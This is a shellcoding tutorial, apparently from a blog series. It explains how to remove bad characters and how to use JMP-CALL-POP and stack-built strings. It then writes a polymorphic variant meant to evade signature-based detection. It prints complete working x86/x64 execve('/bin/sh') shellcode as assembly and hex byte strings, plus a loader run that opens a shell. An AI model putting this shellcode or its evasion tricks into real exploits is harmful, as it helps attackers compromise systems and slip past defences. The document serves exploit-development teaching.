18. Eliminating Bad Chars

Next in our shellcoding journey, we will eliminate bad characters: bytes that get mangled or cut off on the way to the target and break our exploit.

Common Bad Characters:

  • 0x0A (newline) - ends the input in line-based input functions
  • 0x0D (carriage return) - ends a line in many network protocols
  • 0x00 (null) - string terminator, so string copies stop here
  • 0x0C (form feed) - sometimes used as a control character in serial communications
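
Which bytes count as bad depends on the target, so it helps to check a payload mechanically. The sketch below is a hypothetical helper (the name find_bad_chars and its default bad set are assumptions for illustration, not part of any tool used in this series) that reports the offset of every bad byte in a buffer.

```python
def find_bad_chars(shellcode: bytes, bad: bytes = b"\x00\x0a\x0d") -> list[tuple[int, int]]:
    """Return (offset, byte) pairs for every byte of `shellcode` that is in `bad`."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


if __name__ == "__main__":
    # mov ecx, 0 assembles to b9 00 00 00 00, i.e. four null bytes
    sample = bytes.fromhex("b900000000")
    for offset, value in find_bad_chars(sample):
        print(f"offset {offset}: 0x{value:02x}")
```

Pass a different `bad` argument to match whatever the vulnerable input path actually filters.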

JMP-CALL-POP Technique

Although we already used this technique in the previous post, this section shows how to rewrite that code using JMP-CALL-POP and explains why it is often preferred.

Here’s how you can rewrite your shellcode using the JMP-CALL-POP method:

section .text
    global _start

_start:
    jmp short get_string   ; Jump to the get_string label

code:
    pop ebx               ; ebx now points to "/bin/sh" string
    xor eax, eax          ; Clear eax
    mov al, 11            ; execve syscall number
    xor ecx, ecx          ; argv = NULL
    xor edx, edx          ; envp = NULL  
    int 0x80              ; Invoke syscall

get_string:
    call code             ; This pushes the next address onto stack
    db '/bin/sh', 0       ; The string data

jmp short get_string jumps to the get_string label. The call code instruction there does two things:

  • Pushes the address of the next instruction (where our string is) onto the stack
  • Jumps to the code label

The next instruction pop ebx pops the saved address (pointing to our string) into ebx. Now ebx points directly to “/bin/sh” and we can proceed with the syscall.

Let’s assemble and examine:

$ objdump -M intel -d jmp_pop_execve32

jmp_pop_execve32:     file format elf32-i386


Disassembly of section .text:

08049000 <_start>:
 8049000:	eb 0b                	jmp    804900d <get_string>

08049002 <code>:
 8049002:	5b                   	pop    ebx
 8049003:	31 c0                	xor    eax,eax
 8049005:	b0 0b                	mov    al,0xb
 8049007:	31 c9                	xor    ecx,ecx
 8049009:	31 d2                	xor    edx,edx
 804900b:	cd 80                	int    0x80

0804900d <get_string>:
 804900d:	e8 f0 ff ff ff       	call   8049002 <code>
 8049012:	2f                   	das    
 8049013:	62 69 6e             	bound  ebp,QWORD PTR [ecx+0x6e]
 8049016:	2f                   	das    
 8049017:	73 68                	jae    8049081 <get_string+0x74>

Now let’s check for null bytes:

$ ./shellcode_kit.sh  -a x86 --extract jmp_pop_execve32
$ cat shellcode_jmp_pop_execve32.txt 
\xeb\x0b\x5b\x31\xc0\xb0\x0b\x31\xc9\x31\xd2\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

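Beautiful, isn’t it? No null bytes and no hardcoded addresses. Because the call jumps backward, its offset is negative and is padded with 0xff bytes instead of 0x00. One caveat: the extracted bytes stop at the final “h”, without the terminating 0 from the db line, so the string is only terminated if the byte that follows the shellcode in memory is zero, as is typical for a freshly allocated page.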
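
The eb 0b and e8 f0 ff ff ff encodings can be recomputed by hand: both jmp short and call store the distance from the end of the instruction to the target, as a signed little-endian value. The sketch below redoes that arithmetic with the addresses from the objdump listing above; rel8 and rel32 are hypothetical helper names, not part of any assembler API.

```python
import struct


def rel8(insn_addr: int, insn_len: int, target: int) -> bytes:
    """8-bit displacement as used by `jmp short` (opcode eb)."""
    disp = target - (insn_addr + insn_len)  # relative to the next instruction
    return struct.pack("<b", disp)


def rel32(insn_addr: int, insn_len: int, target: int) -> bytes:
    """32-bit displacement as used by a near `call` (opcode e8)."""
    disp = target - (insn_addr + insn_len)  # relative to the next instruction
    return struct.pack("<i", disp)          # signed, little-endian


if __name__ == "__main__":
    print(rel8(0x8049000, 2, 0x804900D).hex())   # jmp short get_string
    print(rel32(0x804900D, 5, 0x8049002).hex())  # call code (backward)
    print(rel32(0x8049000, 5, 0x8049010).hex())  # hypothetical forward call
```

The last line shows why the string sits after a backward call: a short forward call has a small positive displacement, which is padded with three 0x00 bytes.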

We can then pass this to our loader:

$ ./shellcode_kit.sh  -a x86 --run jmp_pop_execve32
Executing Shellcode
----------------------------------------
Shellcode Length: 25 bytes
Allocated executable memory at: 0xeea74000
Executing shellcode...
$ whoami
fury

Storing String on Stack

Sometimes we need to be even more creative. Instead of storing our string in the code section, we can build it directly on the stack:

x86 Version (32-bit)

section .text
    global _start

_start:
    ; execve("//bin/sh", NULL, NULL)
    xor ecx, ecx          ; Clear ecx (argv = NULL)
    mul ecx               ; Clear eax and edx (edx = envp = NULL)
    push ecx              ; Push NULL terminator
    push 0x68732f6e       ; Push "n/sh" (a 32-bit push holds only 4 bytes)
    push 0x69622f2f       ; Push "//bi" (little-endian)
    mov ebx, esp          ; ebx points to "//bin/sh" string
    mov al, 11            ; execve syscall number
    int 0x80

x64 Version (64-bit)

section .text
    global _start

_start:
    ; execve("/bin/sh", NULL, NULL)
    xor rsi, rsi          ; Clear rsi (argv = NULL)
    mul rsi               ; Clear rax and rdx (rdx = envp = NULL)
    mov rdi, 0x68732f6e69622f2f ; "//bin/sh" in reverse (little-endian)
    push rsi              ; Push NULL
    push rdi              ; Push "/bin/sh" string
    mov rdi, rsp          ; rdi points to "/bin/sh" string
    mov al, 59            ; execve syscall number
    syscall
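
The immediate values in these listings are just the path bytes read as little-endian integers. As a quick check, the sketch below derives them from the string itself; to_imm64 and to_push_words are hypothetical names chosen for illustration.

```python
import struct


def to_imm64(path: bytes) -> int:
    """Interpret an 8-byte string as one little-endian 64-bit immediate."""
    (value,) = struct.unpack("<Q", path)
    return value


def to_push_words(path: bytes) -> list[int]:
    """Split an 8-byte string into two 32-bit words, in push order.

    The stack grows downward, so the second half is pushed first.
    """
    first, second = struct.unpack("<II", path)
    return [second, first]


if __name__ == "__main__":
    print(hex(to_imm64(b"//bin/sh")))
    print([hex(w) for w in to_push_words(b"//bin/sh")])
```

On x64 the whole string fits in one register, while a 32-bit register holds only four bytes, so the x86 case needs two words.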

The Art of Polymorphism

Here is our x86 execve shellcode from the previous section:

$ cat shellcode_execve32.txt 
\x31\xc9\xf7\xe1\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80

Now let’s talk about real stealth. Imagine our original shellcode gets detected because it contains \x31 bytes from the xor instruction. To avoid detection, we need to rewrite it without changing what it does. The result is polymorphic shellcode: the core functionality stays the same, but the assembly instructions and the resulting bytes differ, which makes this a fundamental technique for evading signature-based detection.

Let’s break down the original code and see where we can make substitutions.

Step 1: Clearing the Registers Differently

The original shellcode uses xor to zero out register ecx.

  • xor ecx, ecx = \x31\xc9

Our target is the \x31 byte. How else can we zero a register?

  • sub ecx, ecx (subtract from itself) - \x29\xc9
  • mov ecx, 0 (move zero) - \xb9\x00\x00\x00\x00 (not useful: introduces null bytes)
  • and ecx, 0 (bitwise AND with zero) - \x83\xe1\x00 (not useful: introduces a null byte)

Let’s go with sub ecx, ecx. It’s the same size and just as effective!
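
The same selection can be done mechanically. The sketch below takes the encodings listed above and keeps only those free of the signature byte 0x31 and of null bytes; the names CANDIDATES, usable and pick are illustrative assumptions.

```python
# Encodings of four ways to zero ecx, as listed above
CANDIDATES = {
    "xor ecx, ecx": bytes.fromhex("31c9"),
    "sub ecx, ecx": bytes.fromhex("29c9"),
    "mov ecx, 0": bytes.fromhex("b900000000"),
    "and ecx, 0": bytes.fromhex("83e100"),
}


def usable(encoding: bytes, forbidden: bytes = b"\x00\x31") -> bool:
    """True if the encoding contains none of the forbidden bytes."""
    return not any(b in forbidden for b in encoding)


def pick(candidates: dict[str, bytes] = CANDIDATES) -> list[str]:
    """Names of all candidate instructions whose encoding is usable."""
    return [name for name, enc in candidates.items() if usable(enc)]


if __name__ == "__main__":
    print(pick())
```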

Step 2: Building the String on the Stack (Alternative Approach)

The original code places the string on the stack using plain immediates (a 32-bit register such as ebx holds only 4 bytes, so the 8-byte string takes two pushes). Those immediates contain no “bad” bytes for this exercise, but the raw bytes of the path are a very recognizable sequence. Let’s try a stealthier approach: building the string from smaller, disguised values.

We push the string onto the stack in two 4-byte chunks. Remember that the stack grows downward, so the second half goes on first, and that we need a null terminator and little-endian byte order.

We use an 8-byte spelling of the path so that it fills exactly two chunks. Adding an extra slash is a common trick, since the kernel treats repeated slashes as one. For //bin/sh the split is:

  • hs/n = 0x68732f6e
  • ib// = 0x69622f2f

Instead of loading these large, recognizable numbers directly, we can construct them with arithmetic, taking care that the operands themselves contain no 0x00 bytes. The version below uses the equivalent spelling /bin//sh, so its chunks are 0x68732f2f ("//sh") and 0x6e69622f ("/bin").

Here is our rewritten, polymorphic version of the shellcode. It avoids the \x31 byte and uses a different method to build the string.

section .text
    global _start

_start:
    ; execve("/bin/sh", NULL, NULL) - Polymorphic Version

    ; Clear registers without using XOR
    sub ecx, ecx        ; ecx = 0 (argv = NULL). Replaces XOR.
    mov eax, ecx        ; eax = 0 (we'll set the syscall later)
    mov edx, ecx        ; edx = 0 (envp = NULL). Replaces MUL.

    ; Build the string "/bin//sh" on the stack creatively
    push ecx            ; Push NULL terminator (0x00000000)

    ; Each half is loaded as a disguised value and fixed up with an add
    ; Push "//sh" (0x68732f2f)
    mov esi, 0x57621e1e
    add esi, 0x11111111 ; 0x57621e1e + 0x11111111 = 0x68732f2f 
    push esi            ; Push first part ("hs//")

    ; Push "/bin" (0x6e69622f) 
    mov esi, 0x5d58511e
    add esi, 0x11111111 ; 0x5d58511e + 0x11111111 = 0x6e69622f 
    push esi            ; Push second part ("nib/")
    ; Stack now has "/bin//sh"

    mov ebx, esp        ; ebx points to our string

    ; Set up the syscall
    mov al, 11          ; execve syscall number
    int 0x80
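
The two mov/add operand pairs in the listing above can be derived mechanically rather than by hand. The sketch below is one way to do it, assuming the same addend 0x11111111 as the listing; split_for_add and encode_path are hypothetical helper names.

```python
MASK32 = 0xFFFFFFFF


def has_bad(value: int, bad: bytes) -> bool:
    """True if any of the four little-endian bytes of `value` is in `bad`."""
    return any(b in bad for b in value.to_bytes(4, "little"))


def split_for_add(target: int, addend: int = 0x11111111, bad: bytes = b"\x00") -> int:
    """Return base such that (base + addend) mod 2**32 == target."""
    base = (target - addend) & MASK32
    if has_bad(base, bad) or has_bad(addend, bad):
        raise ValueError("operand contains a bad byte; try another addend")
    return base


def encode_path(path: bytes) -> list[int]:
    """Bases for each 4-byte chunk of `path`, in push order (last chunk first)."""
    if len(path) % 4:
        raise ValueError("pad the path to a multiple of 4 bytes, e.g. /bin//sh")
    chunks = [int.from_bytes(path[i:i + 4], "little") for i in range(0, len(path), 4)]
    return [split_for_add(chunk) for chunk in reversed(chunks)]


if __name__ == "__main__":
    for base in encode_path(b"/bin//sh"):
        print(f"mov esi, 0x{base:08x} / add esi, 0x11111111 / push esi")
```

If a base ever comes out containing a bad byte, a different addend (or a sub or xor instead of add) gives another candidate pair.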

If you dump the shellcode, you can verify that it no longer contains any 0x31 bytes. The string /bin//sh is also encoded, so it never appears in plain form.

$ cat shellcode_polymorphic_x86.txt 
\x29\xc9\x89\xc8\x89\xca\x51\xbe\x1e\x1e\x62\x57\x81\xc6\x11\x11\x11\x11\x56\xbe\x1e\x51\x58\x5d\x81\xc6\x11\x11\x11\x11\x56\x89\xe3\xb0\x0b\xcd\x80

No \x31 in sight! We’ve successfully disguised our shellcode while keeping the same functionality.
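
To confirm this without reading hex by eye, the dump can be parsed and searched. The sketch below assumes the \xNN text format shown above; parse_escaped is a hypothetical helper, and POLY is the dump copied verbatim.

```python
def parse_escaped(text: str) -> bytes:
    r"""Convert text of the form \x29\xc9... into raw bytes."""
    return bytes.fromhex(text.strip().replace("\\x", ""))


POLY = (
    r"\x29\xc9\x89\xc8\x89\xca\x51\xbe\x1e\x1e\x62\x57\x81\xc6\x11\x11\x11\x11"
    r"\x56\xbe\x1e\x51\x58\x5d\x81\xc6\x11\x11\x11\x11\x56\x89\xe3\xb0\x0b\xcd\x80"
)

if __name__ == "__main__":
    payload = parse_escaped(POLY)
    print("length:", len(payload))
    print("contains 0x31:", 0x31 in payload)
    print("contains 0x00:", 0x00 in payload)
    print("contains plain '/bin':", b"/bin" in payload)
```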

So what did we learn from all this? Well, in the world of hacking, it’s a constant game of cat and mouse. We figured out how to remove the bad 0x31 byte, but our new shellcode got bigger and more complicated. It’s a classic trade-off: to be more sneaky, you often have to be less efficient. There’s hardly ever just one right answer—just different tools for different jobs.

This post is licensed under CC BY 4.0 by the author.